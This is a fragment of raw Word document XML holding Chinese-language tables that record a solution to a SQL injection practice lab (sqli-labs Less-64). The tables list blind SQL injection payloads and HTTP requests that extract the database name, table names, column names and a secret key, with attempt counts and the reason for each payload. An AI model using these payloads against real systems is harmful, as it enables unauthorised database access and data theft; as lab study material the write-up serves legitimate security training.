              </w:rPr>
              <w:t>,1)))&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)--</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="1EA3D921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得出表名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7B4787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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="59A52CF6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>91</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="76AFB448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?id=1)) and ((ascii(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>substr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">((select </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>column_name</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> from information_schema.columns where table_</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>name</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>='</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>4tz8xeeymz</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>'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default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">limit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1),</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1)))</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>=115</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)--</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="15CAC5E5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判断第三列为固定格式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="20FBF8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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="7889757B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>92-130</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="185E0E4A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?id=1)) and ((ascii(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>substr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">((select </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>column_name</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> from information_schema.columns where table_</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>name</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>='</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>4tz8xeeymz</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>'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default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">limit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1),</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1)))</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&gt;x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)--</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="28C709BD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得出列名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="47E31F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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="69AB3A48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>130-200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="44334266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?id=1))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default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>and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default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>(ascii(substr((select</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> secret_KL4Q </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>from</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> challenges.4tz8xeeymz</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>),</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1))=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$1$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="3ACB1E0F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得出秘钥</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47420521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lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="21A184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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4874CB" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p w14:paraId="7E9B0D8C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i w:val="0"/>
                <w:color w:val="FFFFFF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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>尝试次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4874CB" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p w14:paraId="2462A451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i w:val="0"/>
                <w:color w:val="FFFFFF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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>使用payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4874CB" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p w14:paraId="31135E64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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="36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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>使用payload原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="34D856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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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7755C84D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>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1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662BFC15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?id=1)) and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>substr(database(),1,1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>)=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>challenges</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B01A04F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获取数据库名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4C0941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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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2A991CCA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>2-751</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331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450EAB89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GET /SQL/Less-64/?id=1))%20and%20((ascii(substr((select%20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>table_name</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>%20from%20information_schema.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>table</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>s%20where%20table_</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>schema</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>=%27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>challenges</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>%27%20limit%20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1),</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$1$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1)))=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$2$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)--+ HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0FF46C67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得出表名f3vbm2riil</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54009187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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6D6BD2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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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535644D9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>752-1051</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331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58ED8D58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GET /SQL/Less-64/?id=1))%20and%20(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>f3vbm2riil</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>%27%20limit%202,1),</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$1$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1))=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$2$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)--+ HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3F67BC68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得到列名：secret_6R4N</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59BF3D1B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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="36B65D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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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67FA5ABF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  <w:t>1052-2851</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331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B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2DF12640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GET /SQL/Less-64/?id=1))%20and%20(ascii(substr((select%20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>secret_6R4N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>%20from%20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>challenges.f3vbm2riil</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>),</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$1$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1))=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$2$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)--+ HTTP/1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="613B557F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得到秘钥</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A457301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jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="000000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B0EE9E4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478D6AF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F478D6AF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3356E93"/>
    <w:rsid w:val="04181D4D"/>
    <w:rsid w:val="135C315C"/>
